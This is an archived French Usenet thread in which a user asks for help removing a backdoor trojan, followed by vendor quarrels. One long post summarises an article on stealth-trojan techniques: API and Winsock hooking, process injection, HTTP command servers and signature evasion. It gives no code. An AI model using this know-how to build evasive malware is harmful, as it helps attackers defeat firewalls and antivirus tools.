gros probleme AU SECOURS :(((
JuggernauT
Depuis jourd hui j'ai un gros soucis avec mon explorer,mon antivirus, et mon
firewall.
-mon IE 6 s arrete souvent quand je surfe (la fenetre disparait)
-g eu beau desinstaller et reinstaller mon antivir et mon firewall, ils n
apparaissent plus au demarrage de windows ,et mme en les demarrant
manuellement des que j reduis leurs fenetres ils se ferment .
-quand je met mon anti virus en route ,il fait comme explorer ,la fenetre de
defilement disparait apres qques secondes.
windows xp pro
g testé le firewall netdefense de systemsuite 4.0,son antivirus associé (que
je c plus mettre a jour)
et g mme testé (apres avoir desinstallé systemsuite) Zone Alarm Pro 4.0 avec
l antivirus AVG 6.0 derniere mouture
meme symptomes
resultat :
ben je pense avoir un virus mais g aucun moyen de le verifier car les
antivirus online deconnectent a cause d IE6 defectueux, et mes propres
antivirus font pareils.
je suis ouvert à toutes vos idées ,sauf le formatage ;)
Bien amicalement ,
Ascadix
Sur cette premiere page, récupére ( en bas ) Sysclean
http://www.trendmicro.com/download/dcs.asp
Sur cette seconde page, récupere la pattern ( 682 au moment ou j'écrit )
http://www.trendmicro.com/download/pattern.asp
http://www.trendmicro.com/ftp/products/pattern/lpt682.zip
- dezip dans le dossier ou tu mis Sysclean ..
- lance sysclean
- choisis tes options ( ya pas grand chose à choisir d'ailleur .. nettoyer
ou signaler uniquement
- lance le scan
- patiente
- patiente
- patiente
- patiente
- patiente
- patiente
- regarde le résultat .. as-t-il trouvé qqchose ?
Si non .. tente le coup avec clrav de chez kaspersky (
ftp://ftp.kaspersky.ru/utils... ) ... et ensuite avec une version complete
de KAV
Si toujours rien ... AMHA ... soit t'en à choppé un tout beua tout neuf tout
récent ... soit c'est pas un pb de virus.
--
@+
Ascadix
Ewa (siostra Ani) N.
Ascadix <asc...@netcourrier.com> a écrit:
> Si non .. tente le coup avec clrav de chez kaspersky (
> ftp://ftp.kaspersky.ru/utils... ) ... et ensuite avec une version
> complete de KAV
Dans le même genre d'outils il y a aussi Stinger de McAfee qui a fait
ses preuves, je crois:
http://vil.nai.com/vil/stinger/
Ewcia
--
Niesz !
joke0
JuggernauT:
> ben je pense avoir un virus mais g aucun moyen de le verifier
> car les antivirus online deconnectent a cause d IE6
> defectueux, et mes propres antivirus font pareils.
Redémarre en mode sans échec (F8 au démarrage) et lance un scan
avec ton AV.
Si ça ne donne rien, tu peux essayer avec un autre antivirus et
éventuellement regarder aux endroits habituels d'où se lancent
les vers: http://www.lacave.net/~jokeuse/usenet/demarrage.html
(nouvelle mouture!)
--
joke0
_Chambord_
"Ewa (siostra Ani) N." a écrit :
stinger et clrav sont deux choses differentes
l'un recherche les virus l'autre desinfecte, seulement les virus recents
ou tres rependus et le dernier que pour les dos me semble t il, voir:
http://kav-france.com/faq/index.php?faqcategory=2&faqid=65
Frederic Bonroy
> stinger et clrav sont deux choses differentes
> l'un recherche les virus l'autre desinfecte, seulement les virus recents
> ou tres rependus et le dernier que pour les dos me semble t il, voir:
Il recherchent et désinfectent tous les deux. Clrav n'est PAS un
programme DOS, c'est un programme Windows sans interface graphique
et il s'occupe de virus/vers Windows.
Roland Garcia
> stinger et clrav sont deux choses differentes
> l'un recherche les virus l'autre desinfecte, seulement les virus recents
> ou tres rependus et le dernier que pour les dos me semble t il, voir:
> http://kav-france.com/faq/index.php?faqcategory=2&faqid=65
Raté :-D
Roland Garcia
_Chambord_
Frederic Bonroy a écrit :
Pour clrav peut etre que la pratique le demontre ou que la traduction
est mauvaise , mais le texte laisse entendre qu'il est uniquement un
outil de desinfection:
"Ce kit de désinfection (CLRAV) est un petit exécutable dont
le but est de nettoyer une machine infectée par
un virus particulier. CEt outil kit de désinfection est donc
uniquement capable d' éradiquer un type de virus
particulier voire une version particulière d' un virus. "
Pour Stinger:
Effectivement il est dit:
"By default Stinger will repair all infected files found. "
et il me semble avoir lu sur ce site que la liste des malwares
détectables est limité.
S'ils sont identique comme fonction, quel est l'avantage de l'un part
rapport à l'autre?
Roland Garcia
> Pour clrav peut etre que la pratique le demontre ou que la traduction
> est mauvaise , mais le texte laisse entendre qu'il est uniquement un
> outil de desinfection:
> "Ce kit de désinfection (CLRAV) est un petit exécutable dont
> le but est de nettoyer une machine infectée par
> un virus particulier. CEt outil kit de désinfection est donc
> uniquement capable d' éradiquer un type de virus
> particulier voire une version particulière d' un virus. "
Comment fait-il pour désinfecter s'il ne détecte pas ?
mékilékon ©
Roland Garcia
joke0
Frederic Bonroy:
>> stinger et clrav sont deux choses differentes
> Il recherchent et désinfectent tous les deux. Clrav n'est PAS
> un programme DOS, c'est un programme Windows sans interface
> graphique et il s'occupe de virus/vers Windows.
Tu veux dire qu'il n'aurait pas compris le contenu de mon post
de jeudi? news:XnF94327BB...@joke0.net
Étonnant!
--
joke0
JuggernauT
et je precise que
tout logiciel ki utilise une fenetre windows plante au bout de 5
secs.....(sauf ptet celles DOS)
donc j ai beau essayer mes antivirus ou ceux online .....ca donne rien vu
que ca plante (fenetre se ferme)
j arrive pas à supprimer manuellement svhost.exe
mais en ai supprimé toute trace ds la base de registres.....
si c'est pas dû à ce troyen c'est que j y comprend plus rien (relire mon
post d'origine)
"joke0" <404pagenot...@caramail.com> a écrit dans le message de
news: XnF9436BDB...@joke0.net...
joke0
JuggernauT:
> stinger m indique backdoor.optix.bj sur
> c:\windows\system32\svhost.exe et je precise que
> tout logiciel ki utilise une fenetre windows plante au bout de
> 5 secs.....(sauf ptet celles DOS)
il FAUT que tu redémarres en mode sans échec (touche F8 au tout
début du chargement de win), puis choix "safe mode" ou "sans
échec",
Auparavant, désactive la restauration système:
http://www.lacave.net/~jokeuse/usenet/faq-fcsv.html#a8.5
Puis passe un coup d'antivirus (à jour).
--
joke0
Frederic Bonroy
> Pour clrav peut etre que la pratique le demontre ou que la traduction
> est mauvaise , mais le texte laisse entendre qu'il est uniquement un
> outil de desinfection:
Désinfecter sans détecter, c'est ce que Bush a fait en Irak.
> S'ils sont identique comme fonction, quel est l'avantage de l'un part
> rapport à l'autre?
Stinger est sans doute plus facile à utiliser. Attention: du point de
vue commercial ils ne sont pas complémentaires, mais tout simplement des
concurrents. Qu'il y ait des avantages ou pas n'a pas d'importance.
JuggernauT
antivirus se ferme au bout de 5 secs
j'ai supprimé svhost.exe heureusement ......
ca resout rien ....
mais alors si c'est plus un prob de virus......(restaurer IE 6 par powerIE6
donne rien)
perdu moi là
"joke0" <404pagenot...@caramail.com> a écrit dans le message de
news: XnF94367F8...@joke0.net...
_Chambord_
Frederic Bonroy a écrit :
>
> _Chambord_ a écrit :
>
> > Pour clrav peut etre que la pratique le demontre ou que la traduction
> > est mauvaise , mais le texte laisse entendre qu'il est uniquement un
> > outil de desinfection:
>
> Désinfecter sans détecter, c'est ce que Bush a fait en Irak.
Belle image, mais certain disent que c'est efficace d'autre que ça pose
des problemes, peut etre faut il limiter la comparaison.
Roland Garcia
> _Chambord_ a écrit :
>
>> rapport à l'autre?
>
> Stinger est sans doute plus facile à utiliser. Attention: du point de
> vue commercial ils ne sont pas complémentaires, mais tout simplement des
> concurrents.
Nos trolleurs ont la particularité d'être contre les pratiques
concurrentielles, dans l'intérêt des consommateurs ©
Roland Garcia
Olivier Aichelbaum
>
> _Chambord_ a écrit :
> Comment fait-il pour désinfecter s'il ne détecte pas ?
On peut très bien écrire un programme qui écrase une partie
d'un fichier sans vérifier la présence préalable d'une autre
chaine.
> mékilékon ©
mékilévulgaire ©
--
Olivier Aichelbaum
Olivier Aichelbaum
> Nos trolleurs ont la particularité d'être contre les pratiques
> concurrentielles, dans l'intérêt des consommateurs ©
Vous parlez d'un consultant autrefois lié à Alphasys qui
dénigrait ses concurrents avec des arguments bidons ?
--
Olivier Aichelbaum
Roland Garcia
mais très convaincants.....
Roland Garcia
Roland Garcia
> Roland Garcia wrote:
>
>>_Chambord_ a écrit :
>
>
>>Comment fait-il pour désinfecter s'il ne détecte pas ?
>
> On peut très bien écrire un programme qui écrase une partie
> d'un fichier sans vérifier la présence préalable d'une autre
> chaine.
Nous parlons là de vrais anti-virus et non de gadgets.
Roland Garcia
_Chambord_
Roland Garcia a écrit :
Tu peux parler tu es la depuis des années 24h/24 sur ce forum comme un
panneau Decaux avec écrit dessus Kaspersky , et surtout pas question de
mettre des affiches sur Norton , tes sbires sont la avec des matraques
pour casser du Norton , à commencer par djehuti qui en rate pas une pour
pour faire une allusion pour dire que Norton c'est de la merde. Et apres
ça si quelqu'un réponds pour dire qu'il est pas d'accord , la meute
arrive
pour l'accuser de troller alors que c'est pas lui qui a commencé.
Qu'est ce que j'ai pas entendu il y a un an a propos de l'analyse des
mails de messageries par Norton : que c'était un gadget commercial
rajouté, mais pas un mot de son concurrent qui faisait la même chose.
JacK
_Chambord_ <pour...@wanadoo.fr> signalait:
'lut,
L'analyse du courrier par un module additionnel quel que soit le produit
*est* un gadget commercial, inutile et souvent source de problème.
Me semble que Roland l'a déjà signalé comme beaucoup.
NAV et KAV conseille d'ailleurs sur leur FAQ ou support respectif de le
désactiver....
--
Jack
djehuti
"JacK" <not...@wanadoo.fr> a écrit dans le message news:
bpaleg$1l6nqs$1...@ID-204425.news.uni-berlin.de
>> des matraques pour casser du Norton , à commencer par djehuti qui en
>> rate pas une pour pour faire une allusion pour dire que Norton c'est
>> de la merde.
depuis plusieurs mois, je remarque que Symantec redouble d'effort pour
intégrer divers trojans et backdoors (avec de vrais noms et de véritables
descriptions des bestioles)
je persiste à écrire que "trojan.horse" ou "backdoor.trojan", c'est trop
léger comme détection... et que dans ce cas, il faut faire appel à un VRAI
antivirus (et puisque dans les vrais AV, il n'y a que KAV on-line qui ne
requiert pas de s'enregistrer...)
[pardon à JacK pour le détournement de post]
> L'analyse du courrier par un module additionnel quel que soit le
> produit
> *est* un gadget commercial, inutile et souvent source de problème.
amha, l'analyse du courrier par un antivirus, n'a de sens que pour une
passerelle de messagerie
et même dans ce cas, c'est dangereux de faire ou laisser croire aux
utilisateurs qu'ils sont protégés parce que le courrier est vérifié
un antivirus ne connait que les virus *CONNUS*
> NAV et KAV conseille d'ailleurs sur leur FAQ ou support respectif de
> le désactiver....
alors pourquoi mentionner cette fonction et la présenter comme un atout
supplémentaire dans la lutte contre les virus (bon, quand même pas comme le
fait AVG) ?
@tchao
joke0
JuggernauT:
> ben le probleme c'est que meme en mode sans echec .......la
> fenetre de l antivirus se ferme au bout de 5 secs
> j'ai supprimé svhost.exe heureusement ......
> ca resout rien ....
Si tu as encore ce svchost.exe (dans la poubelle ou s'il a été
recréé) envoie-le moi parce que là, on a aucune info sur cette
backdoor (backdoor.optix.bj [McAfee]).
De plus, quelque chose m'étonne, c'est que Stinger le détecte
mais ne le nettoie pas c'est ça?
Je vois 3 manoeuvres pas trop compliquées:
1) Repasser Stinger pour voir s'il trouve toujours qqc (en mode
sans échec),
2) Tu peux essayer Clrav (de Kaspersky):
ftp://updates3.kaspersky-labs.com/utils/clrav.com
3) Après un démarrage normal, tu fais CTRL+ALT+SUPPR et dans le
gestionnaire de tâches tu repères les processus suspects (tu
peux nous faire une liste si tu veux de l'aide).
--
joke0
Olivier Aichelbaum
> >>Nos trolleurs ont la particularité d'être contre les pratiques
> >>concurrentielles, dans l'intérêt des consommateurs ©
> >
> > Vous parlez d'un consultant autrefois lié à Alphasys qui
> > dénigrait ses concurrents avec des arguments bidons ?
>
> mais très convaincants.....
Oui, certaines personnes ont été convaincus par ces bobards que
j'étais à la solde de Tegam, que son étude prospective contenait
une partie publicitaire, etc. :-((((((
--
Olivier Aichelbaum
djehuti
3FB8E55F...@acbm.com
> [couic] Tegam, que son étude prospective contenait
> une partie publicitaire, etc. :-((((((
et c'était pas vrai ?
@tchao
Roland Garcia
> Oui, certaines personnes ont été convaincus par ces bobards ...
Adressez vous à ces "certaines" personnes.
Roland Garcia
JacK
djehuti <djeh...@aol.com> signalait:
Sans doute OA estime-t-il que ce n'en était pas de signaler à la fin de son
"étude prospective" Notre logiciel protège contre ce genre d'attaques ou qq
ch d'approchant ?
Ils ont fait suffisamment de battage au sujet de cette "étude prospective et
du rapport secrêt" que le tout peut être considéré comme une tentative de
publicité et de désinformation maladroite.
OA n'est sans doute pas d'accord : il voit plutôt des publicités
subliminales pour d'autres produits de sécurité sur ce NG orchestrées par
une bande de lâches anonymes © ou une meute © à la solde de KAV © qui
l'oblige à laver son honneur © après avoir organisé une campagne de
dénigrement contre sa personne et ses publications ©
--
JacK
Frederic Bonroy
> L'analyse du courrier par un module additionnel quel que soit le produit
> *est* un gadget commercial, inutile et souvent source de problème.
Amen.
> Me semble que Roland l'a déjà signalé comme beaucoup.
Oui.
> NAV et KAV conseille d'ailleurs sur leur FAQ ou support respectif de le
> désactiver....
Si c'est un gadget inutile alors il n'y a *aucune* raison de l'inclure,
c'est de la bêtise et c'est valable pour Symantec ET Kaspersky. Ça
illustre bien encore une fois comment les éditeurs se concentrent sur
des choses complètement anodines, il n'y a pas que Microsoft qui fait ça.
Frederic Bonroy
> On peut très bien écrire un programme qui écrase une partie
> d'un fichier sans vérifier la présence préalable d'une autre
> chaine.
Techniquement oui. Techniquement, on peut faire un tas de choses.
Quand on a affaire à un ver, on peut bien sûr écrire un utilitaire de
désinfection qui ne vérifie pas au préalable la présence de ce ver.
Mais:
- cela reviendrait à confier à l'utilisateur la tâche de déterminer et
de décider avec quoi son ordinateur est infecté. Seulement voilà, on ne
peut pas faire confiance à l'utilisateur.
- ça ne fonctionnerait pas avec des vers qui ne s'implantent pas de la
même façon sur tous les ordinateurs, par exemple s'ils utilisent des
noms de fichiers aléatoires.
Avec les virus c'est encore pire, car "désinfecter" ne veut pas
seulement dire "supprimer le virus", mais aussi "rétablir la structure
d'origine du fichier aussi bien que possible" et cela implique la
nécessité d'analyser le fichier infecté.
Roland Garcia
> JacK a écrit :
>> NAV et KAV conseille d'ailleurs sur leur FAQ ou support respectif de le
>> désactiver....
>
> Si c'est un gadget inutile alors il n'y a *aucune* raison de l'inclure,
> c'est de la bêtise et c'est valable pour Symantec ET Kaspersky. Ça
> illustre bien encore une fois comment les éditeurs se concentrent sur
> des choses complètement anodines.....
Parce qu'ils doivent également obéir à une logique marketing parfois
incompatible avec une bonne logique de la sécurité (dite anti-troll).
Roland Garcia
JacK
Frederic Bonroy <bidon...@yahoo.fr> signalait:
Marketing : Le client aime bien les gadgets inutiles et les belles
interfaces en technicolor avec plein de truc qui clignotent ; chacun imite
l'autre, de la même manière qu'il y a des tas de
machins détectés comme virus qui n'en sont pas dans toutes les DB simplement
parce qu'un concurrent le détecte ;)
--
JacK
Frederic Bonroy
> Marketing : Le client aime bien les gadgets inutiles et les belles
> interfaces en technicolor avec plein de truc qui clignotent ;
Ouais, l'antivirus nécessitant DirectX approche à grands pas. :-|
Olivier Aichelbaum
> > Oui, certaines personnes ont été convaincus par ces bobards ...
>
> Adressez vous à ces "certaines" personnes.
Nous préfèrons règler le problème à la source des bobards.
--
Olivier Aichelbaum
Olivier Aichelbaum
> > [couic] Tegam, que son étude prospective contenait
> > une partie publicitaire, etc. :-((((((
>
> et c'était pas vrai ?
Non, c'était mensonger.
--
Olivier Aichelbaum
Olivier Aichelbaum
> >> [couic] Tegam, que son étude prospective contenait
> >> une partie publicitaire, etc. :-((((((
> >
> > et c'était pas vrai ?
> >
> > @tchao
>
> Sans doute OA estime-t-il que ce n'en était pas de signaler à la fin de son
> "étude prospective" Notre logiciel protège contre ce genre d'attaques ou qq
> ch d'approchant ?
Ce n'est pas dans l'étude proprement dite, or c'est bien l'étude
qui a été critiquée sur ce point.
> OA n'est sans doute pas d'accord : il voit plutôt des publicités
> subliminales pour d'autres produits de sécurité sur ce NG orchestrées par
> une bande de lâches anonymes © ou une meute © à la solde de KAV © qui
> l'oblige à laver son honneur © après avoir organisé une campagne de
> dénigrement contre sa personne et ses publications ©
http://www.google.fr/groups?selm=3F189BCE.D36C47CC%40acbm.com
--
Olivier Aichelbaum
Olivier Aichelbaum
> > On peut très bien écrire un programme qui écrase une partie
> > d'un fichier sans vérifier la présence préalable d'une autre
> > chaine.
>
> Techniquement oui. Techniquement, on peut faire un tas de choses.
Ce n'était pas clair à lire l'intervention d'avant, d'où mon
objection.
--
Olivier Aichelbaum
Tweakie
On Mon, 17 Nov 2003, JacK wrote:
> sur les news:3fb8e718$0$10412$626a...@news.free.fr,
> djehuti <djeh...@aol.com> signalait:
>
> Sans doute OA estime-t-il que ce n'en était pas de signaler à la fin de son
> "étude prospective" Notre logiciel protège contre ce genre d'attaques ou qq
> ch d'approchant ?
>
> Ils ont fait suffisamment de battage au sujet de cette "étude prospective et
> du rapport secrêt" que le tout peut être considéré comme une tentative de
> publicité et de désinformation maladroite.
>
Bonjour,
Puisque vous en parlez, il me semble qu'on peut parler un peu
plus serieusement de ce fameux rapport confidentiel depuis qu'une
partie du contenu de celui-ci a ete' reproduite dans le Virus
Bulletin de Juin 2003, et que certains d'entre vous ont lu
(au passage, j'en profite pour remercier certain ).
Pour ca, je vais tenter de resumer tres brievement l'article
de E. Dotan (si des points de ce resume' ne sont pas clairs,
n'hesitez pas a demander):
------------------
Cet article, intitule' "The Scalable Stealth Trojan : Un Upcoming
Danger" s'attache a decrire ce qui pourrait etre "le cheval de troie
du futur", le denomme' "Goodluck" (cette denomination n'est pas
employee dans l'article, mais un communique' de presse publie'
sur le site de tegam permet de faire le lien).
En guise d'introduction, l'auteur precise que si les outils de
securite' actuels (firewalls, firewalls personnels et anti-virus)
offrent une protection efficace contre la plupart des chevaux de
troie "prets a l'usage", ils ne permettent pas de se proteger
contre des chevaux de troie destines a effectuer des attaques
ciblees. L'auteur precise que "Goodluck" utilise une combinaison
de techniques nouvelles et de techniques deja connues permettant
de le rendre furtif ("Although many of these techniques have been
used already by one Trojan or another, they have not yet been
combined to create a `super-stealth' trojan horse").
La premiere partie de l'article, intitulee "Process Identity
Falsification (PIDF)" decrit plusieurs techniques destinees a
garantir cette furtivite'.
Apres un bref rappel du mode de fonctionnement des firewall
personnels (Prise en compte du processus a l'origine du
flux reseau lors du controle d'acces), l'auteur enumere trois
methodes destinees a tromper ceux-ci. La premiere de ces methodes,
baptisee "API Hooking"consiste a detourner des fonctions du
systeme d'exploitation, de maniere a ce que les flux generes
par les fonctions operant le detournement soit attribues aux
processus appelants. La deuxieme methode consiste a effectuer
ce type de detournement au niveau de la couche du systeme
d'exploitation nommee SPI (Winsock's Service Provider
Interface), qui permet d'alterer toutes les operations sur
les sockets. Bien que tres efficace (pas de processus visible,
demarrage du cheval de troie au boot), cette technique est
difficilement exploitable : les droits d'administrateur sont
necessaires pour pouvoir installer le hook. Finalement, une
troisieme technique consiste a injecter le code malveillant
dans la memoire d'un processus existant, en utilisant les
fonctions CreateRemoteThread et WriteProcessMemory du systeme
d'exploitattion (NT/2000/XP). Cette technique ne necessite pas
les droits d'administrateur (NDT: Cette derniere technique,
assez largement employee dans les chevaux de troie a forte
diffusion, est connue sous le terme de "firewall bypass").
Finalement, l'auteur mentionne l'hypothetique cheval de Troie
pourrait etre sous la forme d'un plugin de browser ou de client
mail, ou meme sous celle d'un ActiveX. Il conclut cette premiere
partie de la maniere suivante : "The same techniques work
against behaviour blockers that monitor file or registry I/O -
if SST needs to modify files or registry keys that are protected
by behaviour monitors, PIDF can be used perform the modifications
to appear as if they originated from clean, authorized process."
En Francais, les "bloqueurs" sont eux-aussi vulnerables a ce genre
de techniques de detournement de processus.
La deuxieme partie s'intitule "Passive Communication Protocol
and HQ Servers", elle decrit la mise en place de canaux de
communication entre le cheval de troie et la personne le
controlant (cette communication est bi-directionnelle : envoi
de commandes dans un sens, fuite d'information dans l'autre).
L'auteur rappelle que, pour eviter les blocages par des
firewalls "classiques" certains trojans "de grande distribution"
ne se comportent pas comme des serveurs mais preferent initier
des connections sortante vers un serveur controle' par l'
attaquant (NDT: Cette technique, generalement nommee "LAN Bypass"
a ete' initialement concue pour pouvoir controler des postes
en adressage prive'[cf. RFC 1918]). L'auteur precise aussi
que "Goodluck" tiendrait a jour une liste de serveurs premettant
de le controler, et s'y connecterait via des protocoles standards
comme HTTP, de maniere a passer inapercu. Ainsi, il suffirait que
le cheval de troie visite un site web controle' par l'attaquant
pour y recuperer un ensemble d'instructions. Ces instructions
pourraient par exemple indiquer une nouvelle liste de serveurs
relais ou declencher une mise a jour du cheval de troie. Selon
l'auteur, cette capacite' qu'aurait Goodluck de se mettre a jour
sur demande permettrait de le rendre plus resistants vis-a-vis des
antivirus a signature : "But more importantly, it avoids leaving
a constant signature for the SST Trojan's binary, in case a Trojan's
sample is discovered and sent for analysis at a given time and place".
D'apres lui, le cheval de troie etant programme' dans un langage de
haut niveau, une modification manuelle mineure du code de celui-ci
devrait permettre de rendre la nouvelle version indetectable.
L'envoi de donnees pourrait quant a lui se faire via les protocoles
FTP, SMTP ou HTTP (NDT: SMTP et HTTP sont a l'heure actuelle largement
utilises par la composante de "notification" chevaux de Troie, qui
avertit l'attaquant que sa cible est on-line).
Le paragraphe suivant, "Hiding Further" decrit quelques
fonctionnalites supposees rendre le cheval de troie encore plus
furtif : le detrournement de processus en rapport avec le protocole
de communication utilise', l'envoi de donnees lors des periodes
d'inactivite' de l'ordinateur (en se basant par exemple sur
la mise en route de l'economiseur d'ecran) ou a la suite d'envois
de donnees du meme type inities par l'utilisateur (le trojan
n'envoie un mail que lorsque l'utilisateur vient d'en envoyer un).
Dans une partie intitulee "Real-Scale Testing against Protection
Software", l'auteur precise que des programmes malveillants
utilisant les techniques evoquees ci-dessus ont ete' mis au point
par son equipe pour verifier la validite' de celles-ci, et que
ces programmes ont effectivement permis de contourner avec succes
5 firewall personnels comptant parmis les plus utilises (les noms
ne sont pas precises). Ni un firewall autonome ni les antivirus
testes n'ont permis d'arreter le programme malveillant. Par contre,
celui-ci n'a pu contourner un proxy HTTP avec authentification.
Cependant, l'auteur precise qu'il eut-ete possible de renifler
le mot de passe lors de son transit depuis le browser jusqu'au
serveur web (NDT: S'il avait eu les memes lectures que Nicob, il
aurait envisage' une autre technique).
En conclusion, l'auteur explique qu'il est extremement delicat
de detecter ce type de programme malveillants en utilisant des
methodes heuristiques ou une analyse du code. En effet, des
programmes legitimes utilisent eux-aussi des techniques similaires
a celles employees pour le detournement de processus, et etablir
automatiquement la distinction entre un programme legitime
et un cheval de troie est selon-lui hors de portee des firewalls
personnels a l'heure actuelle ("And let's not forget that while heuristics
are good at detecting some types of virus, they are less
efficient when it comes to detecting unknown trojan horses - even
primitive ones. Generic detection of Trojan horses and, in particular,
hand-crafted Trojan horses, is more in the realm of desktop firewalls.
The fact, as we have demonstrated, that desktop firewalls can be
bypassed is bad news indeed.").
------------------
J'espere n'avoir rien oublie' d'important. Dommage qu'on ne sache
pas ce que le rapport confidentiel contenait en plus...
Des commentaires ?
--
Tweakie
JuggernauT
de AVG qui aparraissait quand stinger se mettait en route,texte ci-dessous:
Virus
Trojan horse Backdoor.Optix.BJ
is found in file C:\Windows\system32\svhost.exe
To remove this virus , please run AVG for Windows
depuis la seule chose qui change c le fonctionnement de AVG en mode sans
echec (il trouve rien)
mais en mode normal j ai les mêmes embrouilles que mon post d'origine.
"joke0" <404pagenot...@caramail.com> a écrit dans le message de
news: XnF9436A42...@joke0.net...
AMcD
> Bonjour,
Yo.
> Cet article, intitule' "The Scalable Stealth Trojan : Un Upcoming
> Danger" s'attache a decrire ce qui pourrait etre "le cheval de troie
> du futur", le denomme' "Goodluck" (cette denomination n'est pas
> employee dans l'article, mais un communique' de presse publie'
> sur le site de tegam permet de faire le lien).
Eh oui. En fait, comme plus personne ne parlait de ce fameux rapport secret
noir devant mettre en danger l'ensemble du Net dans le futur, il fallait
bien en rendre publique une partie. J'ai failli dire, comme tout le monde
s'en tapait un peu, mais bon... D'autant plus que, comme je t'en avait
parlé, Mr Dotan semble avoir redécouvert le fil à couper le beurre. D'aucuns
diront, il a lu la doc du VC++ sur Win32 aux chapitres hook et debugging. Il
y en a qui doivent bien se marrer.
> Apres un bref rappel du mode de fonctionnement des firewall
> personnels (Prise en compte du processus a l'origine du
> flux reseau lors du controle d'acces), l'auteur enumere trois
> methodes destinees a tromper ceux-ci. La premiere de ces methodes,
> baptisee "API Hooking"consiste a detourner des fonctions du
> systeme d'exploitation, de maniere a ce que les flux generes
> par les fonctions operant le detournement soit attribues aux
> processus appelants.
Ouah, trop top ça. Connu depuis des lustres. Au bas mot depuis 1994...
> La deuxieme methode consiste a effectuer
> ce type de detournement au niveau de la couche du systeme
> d'exploitation nommee SPI (Winsock's Service Provider
> Interface), qui permet d'alterer toutes les operations sur
> les sockets. Bien que tres efficace (pas de processus visible,
> demarrage du cheval de troie au boot), cette technique est
> difficilement exploitable : les droits d'administrateur sont
> necessaires pour pouvoir installer le hook.
Bah, on peut toujours se débrouiller autrement pour les avoir les droits.
Mais c'est sûr que c'est pas franchement utilisable. Un peu comme détourner
NTDLL avec des drivers.
> Finalement, une
> troisieme technique consiste a injecter le code malveillant
> dans la memoire d'un processus existant, en utilisant les
> fonctions CreateRemoteThread et WriteProcessMemory du systeme
> d'exploitattion (NT/2000/XP). Cette technique ne necessite pas
> les droits d'administrateur (NDT: Cette derniere technique,
> assez largement employee dans les chevaux de troie a forte
> diffusion, est connue sous le terme de "firewall bypass").
Tu parles, ça fait au moins 5 ans que j'en parle et Richter a du en causer
en 1995 ! Ce n'est pas le fil à couper le beurre qu'il redécouvre, c'est le
silex...
> En Francais, les "bloqueurs" sont eux-aussi vulnerables a ce genre
> de techniques de detournement de processus.
Ben oui, faut bien attirerle chaland suivant le processus classique:
1) On fait peur,
2) On donne la solution, car, chose incroyable, on a la solution en
magasin... Rien de neuf sous le soleil.
> La deuxieme partie s'intitule "Passive Communication Protocol
> and HQ Servers",
Franchement, elle te semble crédible ?
> D'apres lui, le cheval de troie etant programme' dans un langage de
> haut niveau, une modification manuelle mineure du code de celui-ci
> devrait permettre de rendre la nouvelle version indetectable.
Oui, il rédécouvre le x-Morphisme...
> Dans une partie intitulee "Real-Scale Testing against Protection
> Software", l'auteur precise que des programmes malveillants
> utilisant les techniques evoquees ci-dessus ont ete' mis au point
> par son equipe pour verifier la validite' de celles-ci, et que
> ces programmes ont effectivement permis de contourner avec succes
> 5 firewall personnels comptant parmis les plus utilises (les noms
> ne sont pas precises).
Note qu'il s'agit d'un aveu que ça société développe du code malveillant.
> En conclusion, l'auteur explique qu'il est extremement delicat
> de detecter ce type de programme malveillants en utilisant des
> methodes heuristiques ou une analyse du code.
Il aurait pu s'en douter avant non :o) ?
> En effet, des
> programmes legitimes utilisent eux-aussi des techniques similaires
> a celles employees pour le detournement de processus, et etablir
> automatiquement la distinction entre un programme legitime
> et un cheval de troie est selon-lui hors de portee des firewalls
> personnels a l'heure actuelle.
Et oui, le bon vieus principe des running conditions ou du détournement d
eprivilège appliqué à la source, c'est à dire au code même.
> J'espere n'avoir rien oublie' d'important. Dommage qu'on ne sache
> pas ce que le rapport confidentiel contenait en plus...
Des calembredaines du même tonneau, sans nul doute.
> Des commentaires ?
Les mêmes, acides, que je t'ai donné il y a quelques mois : il devrait se
tenir un peu plus au courant sur certains channels de hackers, lire un peu
plus d'articles de Richter, Pietrek ou Robbins et arrêter de faire peur au
béotien.
--
AMcD
http://arnold.mcdonald.free.fr/
Roland Garcia
>
>
> En conclusion, l'auteur explique qu'il est extremement delicat
> de detecter ce type de programme malveillants en utilisant des
> methodes heuristiques ou une analyse du code. En effet, des
> programmes legitimes utilisent eux-aussi des techniques similaires
> a celles employees pour le detournement de processus, et etablir
> automatiquement la distinction entre un programme legitime
> et un cheval de troie est selon-lui hors de portee des firewalls
On en revient au principe d'indéterminabilité de Cohen, les firewalls et
les anti-virus (tous, signature, heuristique, générique....) sont
facilement contournables et il faut se tourner vers une signature à jour
qui peut seule empêcher l'exécution première du code malveillant. Donc
rien de neuf concernant la théorie des virus/trojans.
> Des commentaires ?
Je garde mon anti-virus à jour et continuerai à être prudent.
Roland Garcia
Roland Garcia
> Ce n'est pas dans l'étude proprement dite, or c'est bien l'étude
> qui a été critiquée sur ce point.
Quel rapport avec vos ennuis ? puisque:
1) vous prétendez être "indépendant" donc pas concerné par ceci.
2) vous dites qu'ils viennent (vos ennuis) du fait que les informations
publiées dans votre journal facilitent le piratage.
Donc quel rapport ?
Roland Garcia
Olivier Aichelbaum
> > Ce n'est pas dans l'étude proprement dite, or c'est bien l'étude
> > qui a été critiquée sur ce point.
>
> Quel rapport avec vos ennuis ? puisque:
>
> 1) vous prétendez être "indépendant" donc pas concerné par ceci.
Parce que je suis indépendant, je trouve anormal que cette société
soit victime de mensonges et je le dis.
> 2) vous dites qu'ils viennent (vos ennuis) du fait que les informations
> publiées dans votre journal facilitent le piratage.
>
> Donc quel rapport ?
Aucun rapport, vous mélangez plusieurs choses différentes (et oubliez
vos accusations de propagation de fausses nouvelles).
--
Olivier Aichelbaum
JacK
AMcD <arnold....@free.fr> signalait:
> Les mêmes, acides, que je t'ai donné il y a quelques mois : il
> devrait se tenir un peu plus au courant sur certains channels de
> hackers, lire un peu plus d'articles de Richter, Pietrek ou Robbins
> et arrêter de faire peur au béotien.
Moi, ce qui me fait peur, c'est qu'un dev de produits de sécurité ne soit
pas au courant de ce genre de choses et croie l'avoir découvert alors que
tout le monde est au courant depuis des années. Comme j'ai eu la trouille
pour les utilsateurs lambda lors de Magistr.b où ce même dev signalait
qu'aucun AV ne pouvait le désinfecter, qu'il fallait formater mais que leur
Antivirus (c'est comme ça qu'ils l'appelaient à l'époque, ce n'était pas
encore un friewall antiviral) pouvait protéger efficacement.
Si ce n'est pas de la publicité mensongère, c'est à tout le moins un manque
de compétence.
--
JacK
Roland Garcia
> Roland Garcia wrote:
>>2) vous dites qu'ils viennent (vos ennuis) du fait que les informations
>>publiées dans votre journal facilitent le piratage.
>>
